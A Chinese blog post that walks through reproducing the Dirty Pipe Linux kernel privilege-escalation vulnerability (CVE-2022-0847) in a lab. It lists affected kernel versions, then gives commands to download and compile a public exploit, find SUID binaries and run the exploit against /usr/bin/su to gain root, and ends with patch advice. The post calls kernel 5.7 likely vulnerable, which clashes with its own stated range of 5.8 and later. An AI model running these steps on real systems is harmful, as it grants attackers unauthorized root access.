Dirty Pipe脏管道提权漏洞复现(CVE-2022-0847)

TOC


0x001 漏洞描述?

CVE-2022-0847是自 5.8 以来 Linux 内核中的一个漏洞,攻击者利用该漏洞可以覆盖任意只读文件中的数据。这样将普通的权限提升至root权限,因为非特权进程可以将代码注入到根进程。


0x002 受影响版本

5.8<=Linux kernel<5.16.11/5.15.25/5.10.102


0x003 漏洞靶场搭建

kali主机可以测试
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
符合即可

  • Ubuntu 16.04 或 18.04(推荐)
  • kali2022或者更低版本

0x004 复现步骤

1.漏洞发现

可以看到系统内核 5.7 ,说明可能存在脏管道漏洞

uname -srm

image-20230506105830947

2.漏洞利用
wget https://haxx.in/files/dirtypipez.c    //下载
gcc -o dirtypipez dirtypipez.c    //编译
find / -user root -perm -4000 -print 2>/dev/null   /探针具有 SUID 权限的可执行文件,然后在利用提权

探针出很多个suid可执行文件,随意选择一个即可

image-20230506110943888

./dirtypipez /usr/bin/su
id

image-20230506111132909


0x005 修复建议

更新升级 Linux 内核到以下安全版本:

  • Linux 内核 >= 5.16.11
  • Linux 内核 >= 5.15.25
  • Linux 内核 >= 5.10.102

0x006 总结

攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root

这个漏洞作者将其命名为了 Dirty Pipe(脏管道),一看到这名字讲道理就让人想到了 Dirty Cow(脏牛),这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值